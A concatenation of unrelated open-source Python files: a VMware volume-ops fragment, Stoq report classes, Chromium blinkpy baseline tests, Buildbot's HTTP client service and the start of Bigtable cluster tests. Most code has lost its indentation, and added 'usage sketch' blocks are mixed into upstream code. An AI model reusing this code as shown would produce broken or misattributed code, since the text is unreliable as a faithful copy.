LOG.debug("Initiated deleting vmdk file via task: %s.", task)
self._session.wait_for_task(task)
LOG.info("Deleted vmdk file: %s.", vmdk_file_path)
def _get_all_clusters(self):
clusters = {}
retrieve_result = self._session.invoke_api(vim_util, 'get_objects',
self._session.vim,
'ClusterComputeResource',
self._max_objects)
while retrieve_result:
if retrieve_result.objects:
for cluster in retrieve_result.objects:
name = urllib.parse.unquote(cluster.propSet[0].val)
clusters[name] = cluster.obj
retrieve_result = self.continue_retrieval(retrieve_result)
return clusters
def get_cluster_refs(self, names):
"""Get references to given clusters.
:param names: list of cluster names
:return: Dictionary of cluster names to references
"""
clusters_ref = {}
clusters = self._get_all_clusters()
for name in names:
if name not in clusters:
LOG.error("Compute cluster: %s not found.", name)
raise vmdk_exceptions.ClusterNotFoundException(cluster=name)
clusters_ref[name] = clusters[name]
return clusters_ref
def get_cluster_hosts(self, cluster):
"""Get hosts in the given cluster.
:param cluster: cluster reference
:return: references to hosts in the cluster
"""
hosts = self._session.invoke_api(vim_util,
'get_object_property',
self._session.vim,
cluster,
'host')
host_refs = []
if hosts and hosts.ManagedObjectReference:
host_refs.extend(hosts.ManagedObjectReference)
return host_refs
def get_entity_by_inventory_path(self, path):
"""Returns the managed object identified by the given inventory path.
:param path: Inventory path
:return: Reference to the managed object
"""
return self._session.invoke_api(
self._session.vim,
"FindByInventoryPath",
self._session.vim.service_content.searchIndex,
inventoryPath=path)
def get_inventory_path(self, entity):
return self._session.invoke_api(
vim_util, 'get_inventory_path', self._session.vim, entity)
def _get_disk_devices(self, vm):
disk_devices = []
hardware_devices = self._session.invoke_api(vim_util,
'get_object_property',
self._session.vim,
vm,
'config.hardware.device')
if hardware_devices.__class__.__name__ == "ArrayOfVirtualDevice":
hardware_devices = hardware_devices.VirtualDevice
for device in hardware_devices:
if device.__class__.__name__ == "VirtualDisk":
disk_devices.append(device)
return disk_devices
def get_disk_device(self, vm, vmdk_path):
"""Get the disk device of the VM which corresponds to the given path.
:param vm: VM reference
:param vmdk_path: Datastore path of virtual disk
:return: Matching disk device
"""
disk_devices = self._get_disk_devices(vm)
for disk_device in disk_devices:
backing = disk_device.backing
if (backing.__class__.__name__ == "VirtualDiskFlatVer2BackingInfo"
and backing.fileName == vmdk_path):
return disk_device
def mark_backing_as_template(self, backing):
LOG.debug("Marking backing: %s as template.", backing)
self._session.invoke_api(self._session.vim, 'MarkAsTemplate', backing)
def _create_fcd_backing_spec(self, disk_type, ds_ref):
backing_spec = self._session.vim.client.factory.create(
'ns0:VslmCreateSpecDiskFileBackingSpec')
if disk_type == VirtualDiskType.PREALLOCATED:
disk_type = 'lazyZeroedThick'
backing_spec.provisioningType = disk_type
backing_spec.datastore = ds_ref
return backing_spec
def create_fcd(self, name, size_mb, ds_ref, disk_type):
spec = self._session.vim.client.factory.create('ns0:VslmCreateSpec')
spec.capacityInMB = size_mb
spec.name = name
spec.backingSpec = self._create_fcd_backing_spec(disk_type, ds_ref)
LOG.debug("Creating fcd with spec: %(spec)s on datastore: %(ds_ref)s.",
{'spec': spec, 'ds_ref': ds_ref})
vstorage_mgr = self._session.vim.service_content.vStorageObjectManager
task = self._session.invoke_api(self._session.vim,
'CreateDisk_Task',
vstorage_mgr,
spec=spec)
task_info = self._session.wait_for_task(task)
fcd_loc = FcdLocation.create(task_info.result.config.id, ds_ref)
LOG.debug("Created fcd: %s.", fcd_loc)
return fcd_loc
def delete_fcd(self, fcd_location):
cf = self._session.vim.client.factory
vstorage_mgr = self._session.vim.service_content.vStorageObjectManager
LOG.debug("Deleting fcd: %s.", fcd_location)
task = self._session.invoke_api(self._session.vim,
'DeleteVStorageObject_Task',
vstorage_mgr,
id=fcd_location.id(cf),
datastore=fcd_location.ds_ref())
self._session.wait_for_task(task)
def clone_fcd(self, name, fcd_location, dest_ds_ref, disk_type):
cf = self._session.vim.client.factory
spec = cf.create('ns0:VslmCloneSpec')
spec.name = name
spec.backingSpec = self._create_fcd_backing_spec(disk_type,
dest_ds_ref)
LOG.debug("Copying fcd: %(fcd_loc)s to datastore: %(ds_ref)s with "
"spec: %(spec)s.",
{'fcd_loc': fcd_location,
'spec': spec,
'ds_ref': dest_ds_ref})
vstorage_mgr = self._session.vim.service_content.vStorageObjectManager
task = self._session.invoke_api(self._session.vim,
'CloneVStorageObject_Task',
vstorage_mgr,
id=fcd_location.id(cf),
datastore=fcd_location.ds_ref(),
spec=spec)
task_info = self._session.wait_for_task(task)
dest_fcd_loc = FcdLocation.create(task_info.result.config.id,
dest_ds_ref)
LOG.debug("Clone fcd: %s.", dest_fcd_loc)
return dest_fcd_loc
def extend_fcd(self, fcd_location, new_size_mb):
cf = self._session.vim.client.factory
vstorage_mgr = self._session.vim.service_content.vStorageObjectManager
LOG.debug("Extending fcd: %(fcd_loc)s to %(size)s.",
{'fcd_loc': fcd_location, 'size': new_size_mb})
task = self._session.invoke_api(self._session.vim,
'ExtendDisk_Task',
vstorage_mgr,
id=fcd_location.id(cf),
datastore=fcd_location.ds_ref(),
newCapacityInMB=new_size_mb)
self._session.wait_for_task(task)
def register_disk(self, vmdk_url, name, ds_ref):
vstorage_mgr = self._session.vim.service_content.vStorageObjectManager
LOG.debug("Registering disk: %s as fcd.", vmdk_url)
fcd = self._session.invoke_api(self._session.vim,
'RegisterDisk',
vstorage_mgr,
path=vmdk_url,
name=name)
fcd_loc = FcdLocation.create(fcd.config.id, ds_ref)
LOG.debug("Created fcd: %s.", fcd_loc)
return fcd_loc
def attach_fcd(self, backing, fcd_location):
cf = self._session.vim.client.factory
reconfig_spec = cf.create('ns0:VirtualMachineConfigSpec')
spec = self._create_controller_config_spec(
VirtualDiskAdapterType.LSI_LOGIC)
reconfig_spec.deviceChange = [spec]
self._reconfigure_backing(backing, reconfig_spec)
LOG.debug("Attaching fcd: %(fcd_loc)s to %(backing)s.",
{'fcd_loc': fcd_location, 'backing': backing})
task = self._session.invoke_api(self._session.vim,
"AttachDisk_Task",
backing,
diskId=fcd_location.id(cf),
datastore=fcd_location.ds_ref())
self._session.wait_for_task(task)
def detach_fcd(self, backing, fcd_location):
cf = self._session.vim.client.factory
LOG.debug("Detaching fcd: %(fcd_loc)s from %(backing)s.",
{'fcd_loc': fcd_location, 'backing': backing})
task = self._session.invoke_api(self._session.vim,
"DetachDisk_Task",
backing,
diskId=fcd_location.id(cf))
self._session.wait_for_task(task)
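# --- Hedged usage sketch (not part of the upstream module) ---
# Illustrates how the backing-creation methods above are typically driven;
# the caller is assumed to already hold a configured VMwareVolumeOps
# instance plus folder, resource pool and host references, and the name,
# size and datastore values below are hypothetical.
def _example_create_thin_backing(vops, folder, resource_pool, host):
    # 1 GB expressed in KB, mirroring the units.Mi conversion used above.
    return vops.create_backing('volume-example-backing',
                               size_kb=units.Mi,
                               disk_type=VirtualDiskType.THIN,
                               folder=folder,
                               resource_pool=resource_pool,
                               host=host,
                               ds_name='datastore1')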
class FcdLocation(object):
def __init__(self, fcd_id, ds_ref_val):
self.fcd_id = fcd_id
self.ds_ref_val = ds_ref_val
@classmethod
def create(cls, fcd_id_obj, ds_ref):
return cls(fcd_id_obj.id, ds_ref.value)
def provider_location(self):
return "%s@%s" % (self.fcd_id, self.ds_ref_val)
def ds_ref(self):
return vim_util.get_moref(self.ds_ref_val, 'Datastore')
def id(self, cf):
id_obj = cf.create('ns0:ID')
id_obj.id = self.fcd_id
return id_obj
@classmethod
def from_provider_location(cls, provider_location):
fcd_id, ds_ref_val = provider_location.split('@')
return cls(fcd_id, ds_ref_val)
def __str__(self):
return self.provider_location()
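# --- Hedged usage sketch (not part of the upstream module) ---
# Shows the provider-location round trip supported by FcdLocation; the
# 'fcd-123@datastore-45' value is made up for illustration only.
def _example_fcd_location_roundtrip():
    loc = FcdLocation.from_provider_location('fcd-123@datastore-45')
    assert loc.fcd_id == 'fcd-123'
    assert loc.provider_location() == 'fcd-123@datastore-45'
    # ds_ref() rebuilds a Datastore moref from the stored value.
    return loc.ds_ref()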
|
apache-2.0
|
tiagocardosos/stoq
|
stoqlib/reporting/report.py
|
2
|
10857
|
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2012 Async Open Source
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
import weasyprint
from kiwi.accessor import kgetattr
from kiwi.environ import environ
from stoqlib.database.runtime import get_default_store
from stoqlib.lib.template import render_template
from stoqlib.lib.translation import stoqlib_gettext, stoqlib_ngettext
from stoqlib.lib.formatters import (get_formatted_price, get_formatted_cost,
format_quantity, format_phone_number,
get_formatted_percentage)
from stoqlib.reporting.utils import get_logo_data
_ = stoqlib_gettext
class HTMLReport(object):
template_filename = None
title = ''
complete_header = True
def __init__(self, filename):
self.filename = filename
self.logo_data = get_logo_data(get_default_store())
def _get_formatters(self):
return {
'format_price': get_formatted_price,
'format_cost': get_formatted_cost,
'format_quantity': format_quantity,
'format_percentage': get_formatted_percentage,
'format_phone': format_phone_number,
'format_date': lambda d: d and d.strftime('%x') or '',
}
def get_html(self):
assert self.title
namespace = self.get_namespace()
# Set some defaults if the report did not provide one
namespace.setdefault('subtitle', '')
namespace.setdefault('notes', [])
# Add some filters commonly used in stoq
namespace.update(self._get_formatters())
return render_template(self.template_filename,
report=self,
title=self.title,
complete_header=self.complete_header,
_=stoqlib_gettext,
stoqlib_ngettext=stoqlib_ngettext,
**namespace)
def save_html(self, filename):
        with open(filename, 'w') as html:
            html.write(self.get_html())
            html.flush()
def render(self, stylesheet=None):
template_dir = environ.get_resource_filename('stoq', 'template')
html = weasyprint.HTML(string=self.get_html(),
base_url=template_dir)
return html.render(stylesheets=[weasyprint.CSS(string=stylesheet)])
def save(self):
document = self.render(stylesheet='')
document.write_pdf(self.filename)
#
# Hook methods
#
def get_namespace(self):
"""This hook method can be implemented by children and should return
parameters that will be passed to report template in form of a dict.
"""
return {}
def adjust_for_test(self):
"""This hook method must be implemented by children that generates
reports with data that change with the workstation or point in time.
This allows for the test reports to be always generated with the same
data.
"""
self.logo_data = 'logo.png'
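# --- Hedged usage sketch (not part of the upstream module) ---
# A minimal HTMLReport subclass showing the get_namespace() hook described
# above; the template file name and namespace content are hypothetical.
class _ExampleNoteReport(HTMLReport):
    template_filename = 'note.html'
    title = _('Example note')
    def get_namespace(self):
        # Everything returned here becomes available inside the template.
        return dict(notes=[_('Generated for illustration only')])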
class TableReport(HTMLReport):
"""A report that contains a single table.
    Subclasses must implement get_columns and get_row, and can optionally
implement accumulate, reset and get_summary_row.
"""
#: The title of the report. Will be present in the header.
title = None
#:
subtitle_template = _("Listing {rows} of a total of {total_rows} {item}")
#:
main_object_name = (_("item"), _("items"))
#:
filter_format_string = ""
#:
complete_header = False
#:
template_filename = "objectlist.html"
def __init__(self, filename, data, title=None, blocked_records=0,
status_name=None, filter_strings=None, status=None):
self.title = title or self.title
self.blocked_records = blocked_records
self.status_name = status_name
self.status = status
if filter_strings is None:
filter_strings = []
self.filter_strings = filter_strings
self.data = data
self.columns = self.get_columns()
self._setup_details()
HTMLReport.__init__(self, filename)
def _setup_details(self):
""" This method build the report title based on the arguments sent
by SearchBar to its class constructor.
"""
rows = len(self.data)
total_rows = rows + self.blocked_records
item = stoqlib_ngettext(self.main_object_name[0],
self.main_object_name[1], total_rows)
self.subtitle = self.subtitle_template.format(rows=rows,
total_rows=total_rows, item=item)
base_note = ""
if self.filter_format_string and self.status_name:
base_note += self.filter_format_string % self.status_name.lower()
notes = []
for filter_string in self.filter_strings:
if base_note:
notes.append('%s %s' % (base_note, filter_string))
elif filter_string:
notes.append(filter_string)
self.notes = notes
def get_data(self):
self.reset()
for obj in self.data:
self.accumulate(obj)
yield self.get_row(obj)
def accumulate(self, row):
"""This method is called once for each row in the report.
Here you can create summaries (like the sum of all payments) for the
        report, which will be added to the last row of the table
"""
pass
def reset(self):
"""This is called when the iteration on all the rows starts.
        Use this to set up or reset any necessary data (like the summaries)
"""
pass
def get_summary_row(self):
"""If the table needs a summary row in the end, this method should
return the list of values that will be in this last row.
The values should already be formatted for presentation.
"""
return []
def get_columns(self):
"""Get the columns for this table report.
This should return a list of dictionaries defining each column in the
table. The dictionaries should define the keys 'title', with the string
        that will be in the header of the table, and 'align', for adjusting the
alignment of the column ('left', 'right' or 'center')
"""
raise NotImplementedError
def get_row(self, obj):
"""Returns the data to be displayed in the row.
        Subclasses must implement this method and return a list with one value
        for each cell in the row. These values should already be formatted
        correctly (i.e., a date should already be converted to a string in the
        desired format).
"""
raise NotImplementedError
class ObjectListReport(TableReport):
"""Creates an pdf report from an objectlist and its current state
This report will only show the columns that are visible, in the order they
are visible. It will also show the filters that were enabled when the report
was generated.
"""
#: Defines the columns that should have a summary in the last row of the
#: report. This is a list of strings defining the attribute of the
#: respective column. Currently, only numeric values are supported (Decimal,
    #: currency, etc.).
summary = []
def __init__(self, filename, objectlist, data, *args, **kwargs):
self._objectlist = objectlist
TableReport.__init__(self, filename, data, *args, **kwargs)
def get_columns(self):
import gtk
alignments = {
gtk.JUSTIFY_LEFT: 'left',
gtk.JUSTIFY_RIGHT: 'right',
gtk.JUSTIFY_CENTER: 'center',
}
# The real columns from the objectlist
self._columns = []
columns = []
for c in self._objectlist.get_columns():
if not c.treeview_column.get_visible():
continue
if c.data_type == gtk.gdk.Pixbuf:
continue
self._columns.append(c)
columns.append(dict(title=c.title, align=alignments.get(c.justify)))
return columns
def get_cell(self, obj, column):
#XXX Maybe the default value should be ''
return column.as_string(kgetattr(obj, column.attribute, None), obj)
def get_row(self, obj):
row = []
for c in self._columns:
row.append(self.get_cell(obj, c))
return row
def accumulate(self, row):
"""This method is called once for each row in the report.
Here you can create summaries (like the sum of all payments) for the
report, that will be added in the last row of the table
"""
for i in self.summary:
self._summary[i] += getattr(row, i, 0) or 0
def reset(self):
"""This is called when the iteration on all the rows starts.
        Use this to set up or reset any necessary data (like the summaries)
"""
self._summary = {}
for i in self.summary:
self._summary[i] = 0
def get_summary_row(self):
if not self.summary:
return []
row = []
for column in self._columns:
value = self._summary.get(column.attribute, '')
if value:
value = column.as_string(value)
row.append(value)
return row
class ObjectTreeReport(ObjectListReport):
"""Creates an pdf report from an objecttree and its current state
This report will only show the columns that are visible, in the order they
are visible. It will also show the filters that were enabled when the report
    was generated. Finally, it displays parent rows in bold and children rows
    shifted a little to the right.
"""
template_filename = "objecttree.html"
def get_row(self, obj):
row = []
for c in self._columns:
row.append(self.get_cell(obj, c))
return self.has_parent(obj), row
def has_parent(self, obj):
raise NotImplementedError
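# --- Hedged usage sketch (not part of the upstream module) ---
# A minimal TableReport subclass illustrating the get_columns()/get_row()
# contract documented above; the column set and the payment objects it
# expects (description/value attributes) are hypothetical.
class _ExamplePaymentsReport(TableReport):
    title = _('Payments')
    def get_columns(self):
        return [dict(title=_('Description'), align='left'),
                dict(title=_('Value'), align='right')]
    def get_row(self, obj):
        # Values must already be formatted for presentation.
        return [obj.description, get_formatted_price(obj.value)]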
|
gpl-2.0
|
chromium/chromium
|
third_party/blink/tools/blinkpy/tool/commands/copy_existing_baselines_unittest.py
|
7
|
6922
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
from blinkpy.tool.commands.rebaseline_unittest import BaseTestCase
from blinkpy.tool.commands.copy_existing_baselines import CopyExistingBaselines
class TestCopyExistingBaselines(BaseTestCase):
command_constructor = CopyExistingBaselines
def options(self, **kwargs):
options_dict = {
'results_directory': None,
'suffixes': 'txt',
'verbose': False,
'port_name': None,
}
options_dict.update(kwargs)
return optparse.Values(options_dict)
def baseline_path(self, path_from_web_test_dir):
port = self.tool.port_factory.get()
return self.tool.filesystem.join(port.web_tests_dir(),
path_from_web_test_dir)
# The tests in this class all depend on the fall-back path graph
# that is set up in |TestPort.FALLBACK_PATHS|.
def test_copy_baseline_mac_newer_to_older_version(self):
# The test-mac-mac10.11 baseline is copied over to the test-mac-mac10.10
# baseline directory because test-mac-mac10.10 is the "immediate
# predecessor" in the fall-back graph.
self._write(
self.baseline_path(
'platform/test-mac-mac10.11/failures/expected/image-expected.txt'
), 'original test-mac-mac10.11 result')
self.assertFalse(
self.tool.filesystem.exists(
self.baseline_path(
'platform/test-mac-mac10.10/failures/expected/image-expected.txt'
)))
self.command.execute(
self.options(
port_name='test-mac-mac10.11',
test='failures/expected/image.html'), [], self.tool)
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-mac-mac10.11/failures/expected/image-expected.txt'
)), 'original test-mac-mac10.11 result')
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-mac-mac10.10/failures/expected/image-expected.txt'
)), 'original test-mac-mac10.11 result')
def test_copy_baseline_to_multiple_immediate_predecessors(self):
# The test-win-win10 baseline is copied over to the test-linux-trusty
# and test-win-win7 baseline paths, since both of these are "immediate
# predecessors".
self._write(
self.baseline_path(
'platform/test-win-win10/failures/expected/image-expected.txt'
), 'original test-win-win10 result')
self.assertFalse(
self.tool.filesystem.exists(
self.baseline_path(
'platform/test-linux-trusty/failures/expected/image-expected.txt'
)))
self.command.execute(
self.options(
port_name='test-win-win10',
test='failures/expected/image.html'), [], self.tool)
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-win-win10/failures/expected/image-expected.txt'
)), 'original test-win-win10 result')
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-linux-trusty/failures/expected/image-expected.txt'
)), 'original test-win-win10 result')
self.assertEqual(
self._read(
self.baseline_path(
                    'platform/test-win-win7/failures/expected/image-expected.txt'
)), 'original test-win-win10 result')
def test_no_copy_existing_baseline(self):
# If a baseline exists already for an "immediate predecessor" baseline
# directory, (e.g. test-linux-trusty), then no "immediate successor"
# baselines (e.g. test-win-win10) are copied over.
self._write(
self.baseline_path(
'platform/test-win-win10/failures/expected/image-expected.txt'
), 'original test-win-win10 result')
self._write(
self.baseline_path(
'platform/test-linux-trusty/failures/expected/image-expected.txt'
), 'original test-linux-trusty result')
self.command.execute(
self.options(
port_name='test-win-win10',
test='failures/expected/image.html'), [], self.tool)
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-win-win10/failures/expected/image-expected.txt'
)), 'original test-win-win10 result')
self.assertEqual(
self._read(
self.baseline_path(
'platform/test-linux-trusty/failures/expected/image-expected.txt'
)), 'original test-linux-trusty result')
def test_no_copy_skipped_test(self):
# If a test is skipped on some platform, no baselines are copied over
# to that directory. In this example, the test is skipped on linux,
# so the test-win-win10 baseline is not copied over.
port = self.tool.port_factory.get('test-win-win10')
self._write(
self.baseline_path(
'platform/test-win-win10/failures/expected/image-expected.txt'
), 'original test-win-win10 result')
self._write(port.path_to_generic_test_expectations_file(),
('# tags: [ Win Linux ]\n'
'# results: [ Failure Skip ]\n'
'[ Win ] failures/expected/image.html [ Failure ]\n'
'[ Linux ] failures/expected/image.html [ Skip ]\n'))
self.command.execute(
self.options(
port_name='test-win-win10',
test='failures/expected/image.html'), [], self.tool)
self.assertFalse(
self.tool.filesystem.exists(
self.baseline_path(
'platform/test-linux-trusty/failures/expected/image-expected.txt'
)))
def test_port_for_primary_baseline(self):
# Testing a protected method - pylint: disable=protected-access
self.assertEqual(
self.command._port_for_primary_baseline('test-linux-trusty').
name(), 'test-linux-trusty')
self.assertEqual(
self.command._port_for_primary_baseline('test-mac-mac10.11').
name(), 'test-mac-mac10.11')
def test_port_for_primary_baseline_not_found(self):
# Testing a protected method - pylint: disable=protected-access
with self.assertRaises(Exception):
self.command._port_for_primary_baseline('test-foo-foo4.7')
|
bsd-3-clause
|
protatremy/buildbot
|
master/buildbot/util/httpclientservice.py
|
5
|
7451
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json as jsonmodule
import textwrap
from twisted.internet import defer
from twisted.web.client import Agent
from twisted.web.client import HTTPConnectionPool
from zope.interface import implementer
from buildbot import config
from buildbot.interfaces import IHttpResponse
from buildbot.util import service
from buildbot.util import toJson
from buildbot.util import unicode2bytes
from buildbot.util.logger import Logger
try:
import txrequests
except ImportError:
txrequests = None
try:
import treq
implementer(IHttpResponse)(treq.response._Response)
except ImportError:
treq = None
log = Logger()
@implementer(IHttpResponse)
class TxRequestsResponseWrapper(object):
def __init__(self, res):
self._res = res
def content(self):
return defer.succeed(self._res.content)
def json(self):
return defer.succeed(self._res.json())
@property
def code(self):
return self._res.status_code
class HTTPClientService(service.SharedService):
"""A SharedService class that can make http requests to remote services.
    I can use either txrequests or treq, depending on what I find installed.
    I provide a minimal get/post/put/delete API with automatic baseurl joining and json data
    encoding that is suitable for use from buildbot services.
"""
TREQ_PROS_AND_CONS = textwrap.dedent("""
txrequests is based on requests and is probably a bit more mature, but it requires threads to run,
so has more overhead.
       treq is better integrated in twisted and is getting closer to feature parity with requests.
txrequests is 2.8x slower than treq due to the use of threads.
http://treq.readthedocs.io/en/latest/#feature-parity-w-requests
pip install txrequests
or
pip install treq
""")
    # Those could in theory be overridden in master.cfg by using
    #   buildbot.util.httpclientservice.HTTPClientService.PREFER_TREQ = True
    # but we prefer for the moment to keep it simple.
PREFER_TREQ = False
MAX_THREADS = 5
def __init__(self, base_url, auth=None, headers=None, verify=None, debug=False):
assert not base_url.endswith(
"/"), "baseurl should not end with /: " + base_url
service.SharedService.__init__(self)
self._base_url = base_url
self._auth = auth
self._headers = headers
self._session = None
self.verify = verify
self.debug = debug
def updateHeaders(self, headers):
if self._headers is None:
self._headers = {}
self._headers.update(headers)
@staticmethod
def checkAvailable(from_module):
"""Call me at checkConfig time to properly report config error
if neither txrequests or treq is installed
"""
if txrequests is None and treq is None:
config.error("neither txrequests nor treq is installed, but {} is requiring it\n\n{}".format(
from_module, HTTPClientService.TREQ_PROS_AND_CONS))
def startService(self):
# treq only supports basicauth, so we force txrequests if the auth is
# something else
if self._auth is not None and not isinstance(self._auth, tuple):
self.PREFER_TREQ = False
if txrequests is not None and not self.PREFER_TREQ:
self._session = txrequests.Session()
self._doRequest = self._doTxRequest
elif treq is None:
raise ImportError("{classname} requires either txrequest or treq install."
" Users should call {classname}.checkAvailable() during checkConfig()"
" to properly alert the user.".format(classname=self.__class__.__name__))
else:
self._doRequest = self._doTReq
self._pool = HTTPConnectionPool(self.master.reactor)
self._pool.maxPersistentPerHost = self.MAX_THREADS
self._agent = Agent(self.master.reactor, pool=self._pool)
def stopService(self):
if self._session:
return self._session.close()
return self._pool.closeCachedConnections()
def _prepareRequest(self, ep, kwargs):
assert ep == "" or ep.startswith("/"), "ep should start with /: " + ep
url = self._base_url + ep
if self._auth is not None and 'auth' not in kwargs:
kwargs['auth'] = self._auth
headers = kwargs.get('headers', {})
if self._headers is not None:
headers.update(self._headers)
kwargs['headers'] = headers
# we manually do the json encoding in order to automatically convert timestamps
# for txrequests and treq
json = kwargs.pop('json', None)
if isinstance(json, dict):
jsonStr = jsonmodule.dumps(json, default=toJson)
jsonBytes = unicode2bytes(jsonStr)
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = jsonBytes
return url, kwargs
def _doTxRequest(self, method, ep, **kwargs):
url, kwargs = self._prepareRequest(ep, kwargs)
if self.debug:
log.debug("http {url} {kwargs}", url=url, kwargs=kwargs)
def readContent(session, res):
# this forces reading of the content inside the thread
res.content
if self.debug:
log.debug("==> {code}: {content}", code=res.status_code, content=res.content)
return res
# read the whole content in the thread
kwargs['background_callback'] = readContent
if self.verify is False:
kwargs['verify'] = False
d = self._session.request(method, url, **kwargs)
d.addCallback(TxRequestsResponseWrapper)
d.addCallback(IHttpResponse)
return d
def _doTReq(self, method, ep, **kwargs):
url, kwargs = self._prepareRequest(ep, kwargs)
# treq requires header values to be an array
kwargs['headers'] = dict([(k, [v])
for k, v in kwargs['headers'].items()])
kwargs['agent'] = self._agent
d = getattr(treq, method)(url, **kwargs)
d.addCallback(IHttpResponse)
return d
    # let's be nice to the auto completers, and not generate that code dynamically
def get(self, ep, **kwargs):
return self._doRequest('get', ep, **kwargs)
def put(self, ep, **kwargs):
return self._doRequest('put', ep, **kwargs)
def delete(self, ep, **kwargs):
return self._doRequest('delete', ep, **kwargs)
def post(self, ep, **kwargs):
return self._doRequest('post', ep, **kwargs)
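# --- Illustrative usage sketch (not part of the original module) ---
# How a Buildbot service might drive HTTPClientService. Only checkAvailable(),
# updateHeaders() and the get/post helpers below come from the API defined above;
# the getService() constructor is assumed to be provided by the service.SharedService
# base class, and the URL, endpoint and token are hypothetical.
#
#     from twisted.internet import defer
#     from buildbot.util import httpclientservice
#
#     class MyReporter(object):
#         def checkConfig(self, base_url, token, **kwargs):
#             # fail early at config time if neither txrequests nor treq is installed
#             httpclientservice.HTTPClientService.checkAvailable(self.__class__.__name__)
#
#         @defer.inlineCallbacks
#         def reconfigService(self, base_url, token, **kwargs):
#             self._http = yield httpclientservice.HTTPClientService.getService(
#                 self.master, base_url)  # assumed SharedService helper
#             self._http.updateHeaders({'Authorization': 'Bearer ' + token})
#
#         @defer.inlineCallbacks
#         def send(self, payload):
#             res = yield self._http.post('/api/results', json=payload)
#             body = yield res.json()
#             defer.returnValue((res.code, body))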
|
gpl-2.0
|
googleapis/python-bigtable
|
tests/unit/test_cluster.py
|
1
|
22563
|
# Copyright 2015 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
import pytest
from ._testing import _make_credentials
class TestCluster(unittest.TestCase):
PROJECT = "project"
INSTANCE_ID = "instance-id"
LOCATION_ID = "location-id"
CLUSTER_ID = "cluster-id"
LOCATION_ID = "location-id"
CLUSTER_NAME = (
"projects/" + PROJECT + "/instances/" + INSTANCE_ID + "/clusters/" + CLUSTER_ID
)
LOCATION_PATH = "projects/" + PROJECT + "/locations/"
SERVE_NODES = 5
OP_ID = 5678
OP_NAME = "operations/projects/{}/instances/{}/clusters/{}/operations/{}".format(
PROJECT, INSTANCE_ID, CLUSTER_ID, OP_ID
)
KEY_RING_ID = "key-ring-id"
CRYPTO_KEY_ID = "crypto-key-id"
KMS_KEY_NAME = f"{LOCATION_PATH}/keyRings/{KEY_RING_ID}/cryptoKeys/{CRYPTO_KEY_ID}"
@staticmethod
def _get_target_class():
from google.cloud.bigtable.cluster import Cluster
return Cluster
def _make_one(self, *args, **kwargs):
return self._get_target_class()(*args, **kwargs)
@staticmethod
def _get_target_client_class():
from google.cloud.bigtable.client import Client
return Client
def _make_client(self, *args, **kwargs):
return self._get_target_client_class()(*args, **kwargs)
def test_constructor_defaults(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(self.CLUSTER_ID, instance)
self.assertEqual(cluster.cluster_id, self.CLUSTER_ID)
self.assertIs(cluster._instance, instance)
self.assertIsNone(cluster.location_id)
self.assertIsNone(cluster.state)
self.assertIsNone(cluster.serve_nodes)
self.assertIsNone(cluster.default_storage_type)
self.assertIsNone(cluster.kms_key_name)
def test_constructor_non_default(self):
from google.cloud.bigtable.enums import StorageType
from google.cloud.bigtable.enums import Cluster
STATE = Cluster.State.READY
STORAGE_TYPE_SSD = StorageType.SSD
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID,
instance,
location_id=self.LOCATION_ID,
_state=STATE,
serve_nodes=self.SERVE_NODES,
default_storage_type=STORAGE_TYPE_SSD,
kms_key_name=self.KMS_KEY_NAME,
)
self.assertEqual(cluster.cluster_id, self.CLUSTER_ID)
self.assertIs(cluster._instance, instance)
self.assertEqual(cluster.location_id, self.LOCATION_ID)
self.assertEqual(cluster.state, STATE)
self.assertEqual(cluster.serve_nodes, self.SERVE_NODES)
self.assertEqual(cluster.default_storage_type, STORAGE_TYPE_SSD)
self.assertEqual(cluster.kms_key_name, self.KMS_KEY_NAME)
def test_name_property(self):
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(self.CLUSTER_ID, instance)
self.assertEqual(cluster.name, self.CLUSTER_NAME)
def test_kms_key_name_property(self):
client = _Client(self.PROJECT)
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID, instance, kms_key_name=self.KMS_KEY_NAME
)
self.assertEqual(cluster.kms_key_name, self.KMS_KEY_NAME)
with pytest.raises(AttributeError):
cluster.kms_key_name = "I'm read only"
def test_from_pb_success(self):
from google.cloud.bigtable_admin_v2.types import instance as data_v2_pb2
from google.cloud.bigtable import enums
